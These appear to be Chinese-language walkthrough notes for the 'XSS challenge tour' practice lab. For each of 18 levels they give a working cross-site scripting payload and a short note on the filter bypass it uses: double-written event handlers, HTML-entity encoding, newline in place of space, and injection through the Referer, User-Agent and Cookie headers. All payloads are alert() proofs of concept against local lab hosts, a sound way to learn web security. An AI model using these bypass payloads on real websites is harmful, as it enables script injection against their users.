XSSchallengetour靶机测试笔记

-使用vulstudy一键搭建靶机

1 http://192.168.0.200:8091/level1.php?name=test<script>alert(/x/)</script>

2 http://192.168.0.200:8091/level2.php?keyword=test"><script>alert(/x/)</script>

3 http://192.168.0.200:8091/level3.php?keyword=xx'+onmouseover%3D'alert(%2Fx%2F)&submit=搜索
Payload: onmouseover='alert(1)

4 http://192.168.0.200:8091/level4.php?keyword=try+harder!"+onmouseover%3D"alert(%2Fx%2F)&submit=搜索
Payload: onmouseover="alert(1)

5 http://192.168.0.200:8091/level5.php?keyword=find+a+way+out!"><embed+src%3Djavascript%3Aalert(1)>&submit=搜索
本题会检测'on' 字符串和script ，检测到会自动添加下划线为o_nmouseover

6 http://192.168.0.200:8091/level6.php?keyword=break+it+out!"><scRipt>alert(%2Fx%2F)<%2Fscript>&submit=搜索
检测href src on data字符并添加下划线
Payload:

7 http://192.168.0.200:8091/level7.php?keyword=move+up!"+oonnmouseover%3D"alert(1)&submit=搜索
过滤on字符，考虑双写
Payload: oonnmouseover="alert(1)

8 http://192.168.0.200:8091/level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2348%3B%26%2341&submit=添加友情链接
检测href src on data字符并添加下划线，同时对输入的双引号进行html编码
Payload: 使用unicode编码javascript:alert(0),即

javascript:alert(1&#41

#python2脚本生成unicode
orgCode='javascript:alert(0)'  #替换脚本
print ';'.join('&#{}'.format(ord(x)) for x in orgCode)

参考：https://programmer.help/blogs/xss-challenge-tour-by-reading-the-code.html

9 Payload:

javascript:alert(1&#41//http://

考察绕过strpos

10
Payload: " autofocus="" onfocus="javascript:alert(1)" type="
利用type=""覆盖掉input的隐藏type，从而执行onfocus

11 Payload: 在refer处添加 " autofocus="" onfocus="javascript:alert(1)" type="

12 Payload: 在user-agent处添加 " autofocus="" onfocus="javascript:alert(1)" type="

13 Payload: 在cookie中user处添加 " autofocus="" onfocus="javascript:alert(1)" type="

14 页面生成cookie有问题

15 Payload: http://10.150.10.186:8091/level15.php?src='level6.php'
ng-include 为AngularJS 指令 ，主要用来包含其他文件，我们可以包含之前的文件来插入xss。注意这儿使用时浏览器会访问googleapis.com失败导致刷不出来

16 考察绕过空格
Payload: <img%0Asrc=x%0Aonerror=alert(0)>

17 这儿有坑，在firefox下embed标签不显示，不显示的话就利用不成功，需要在chrome下才能正常成功
Payload: http://10.150.10.186:8091/level17.php?arg01=x&arg02= onmouseover=javascript:alert(1)

18 http://192.168.61.242:8091/level18.php?arg01= onmouseover&arg02=alert(0)